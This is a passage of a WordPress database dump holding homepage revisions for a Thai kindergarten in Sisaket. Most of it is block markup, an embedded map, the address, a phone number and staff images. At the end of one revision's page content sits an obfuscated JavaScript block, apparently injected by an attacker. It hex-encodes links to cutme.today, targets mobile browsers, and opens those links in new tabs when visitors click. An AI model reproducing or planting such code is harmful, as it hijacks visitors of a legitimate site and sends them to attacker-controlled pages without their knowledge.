ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-09-24 11:20:48','2024-09-24 04:20:48','',19,'http://watprato.ssk.in.th/?p=420',0,'revision','',0),
(421,2,'2024-09-24 11:21:11','2024-09-24 04:21:11','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist 